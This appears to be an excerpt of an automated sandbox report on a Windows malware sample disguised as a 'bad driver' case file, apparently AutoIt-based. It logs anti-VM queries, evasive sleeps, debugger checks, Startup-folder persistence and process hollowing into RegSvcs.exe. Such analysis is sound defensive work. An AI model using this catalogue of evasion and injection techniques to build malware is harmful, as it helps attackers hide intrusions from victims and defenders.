Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C14696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00C14696
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C1C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00C1C9C7
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C1C93C FindFirstFileW,FindClose, 0_2_00C1C93C
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C1F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C1F200
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C1F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C1F35D
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C1F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00C1F65E
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C13A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C13A2B
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C13D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C13D4E
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C1BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00C1BF27
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A24696 GetFileAttributesW,FindFirstFileW,FindClose, 8_2_00A24696
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 8_2_00A2C9C7
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A2C93C FindFirstFileW,FindClose, 8_2_00A2C93C
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00A2F200
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00A2F35D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A2F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 8_2_00A2F65E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_00A23A2B
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_00A23D4E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A2BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 8_2_00A2BF27
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BB4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BB4AFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598969 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597400 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597250 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597110 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596995 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596865 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596722 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596600 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596447 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596341 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596221 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596089 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595984 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595874 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595516 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595406 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595297 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595188 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595063 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594938 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594718 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594610 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599778 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598308 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598171 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598033 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597907 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597782 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597634 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597428 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597205 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597079 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596782 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596547 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595354 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595250 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595074 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594943 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594805 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594688 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594563 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594438 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594219 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594094 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593985 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593860 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593735 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593610 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593485 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593360 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593235 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593110 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592985 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592860 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592735 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592610 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592485 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592360 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592235 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592110 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 591985 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 591860 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 591735 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 591610 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 591485 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 591360 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 591235 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 591110 Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ Jump to behavior
Source: RegSvcs.exe, 0000000B.00000002.3478580853.00000000053E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
Source: RegSvcs.exe, 0000000F.00000002.3846760506.0000000005723000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 0000000D.00000002.3438134226.000001D482816000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B)
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\directory\name.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\directory\name.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API call chain: ExitProcess graph end node
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C241FD BlockInput, 0_2_00C241FD
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BB3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00BB3B4C
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BE5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00BE5CCC
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 11_2_004019F0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C2C304 LoadLibraryA,GetProcAddress, 0_2_00C2C304
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_015135E0 mov eax, dword ptr fs:[00000030h] 0_2_015135E0
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_01513580 mov eax, dword ptr fs:[00000030h] 0_2_01513580
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_01511ED0 mov eax, dword ptr fs:[00000030h] 0_2_01511ED0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00F135E0 mov eax, dword ptr fs:[00000030h] 8_2_00F135E0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00F13580 mov eax, dword ptr fs:[00000030h] 8_2_00F13580
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00F11ED0 mov eax, dword ptr fs:[00000030h] 8_2_00F11ED0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 10_2_00F035E0 mov eax, dword ptr fs:[00000030h] 10_2_00F035E0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 10_2_00F01ED0 mov eax, dword ptr fs:[00000030h] 10_2_00F01ED0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 10_2_00F03580 mov eax, dword ptr fs:[00000030h] 10_2_00F03580
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C081F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00C081F7
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BDA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BDA395
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BDA364 SetUnhandledExceptionFilter, 0_2_00BDA364
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009EA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_009EA395
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009EA364 SetUnhandledExceptionFilter, 8_2_009EA364
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_004123F1 SetUnhandledExceptionFilter, 11_2_004123F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\directory\name.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 430000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\directory\name.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: ABF008 Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C08C93 LogonUserW, 0_2_00C08C93
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BB3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00BB3B4C
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BB4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00BB4A35
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C14EC9 mouse_event, 0_2_00C14EC9
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C081F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00C081F7
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C14C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00C14C03
Source: Case_Your company bad driver Vehicle No.exe, name.exe.0.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Case_Your company bad driver Vehicle No.exe, name.exe Binary or memory string: Shell_TrayWnd
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BD886B cpuid 0_2_00BD886B
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: GetLocaleInfoA, 11_2_00417A20
Queries the volume information (name, serial number etc) of a device
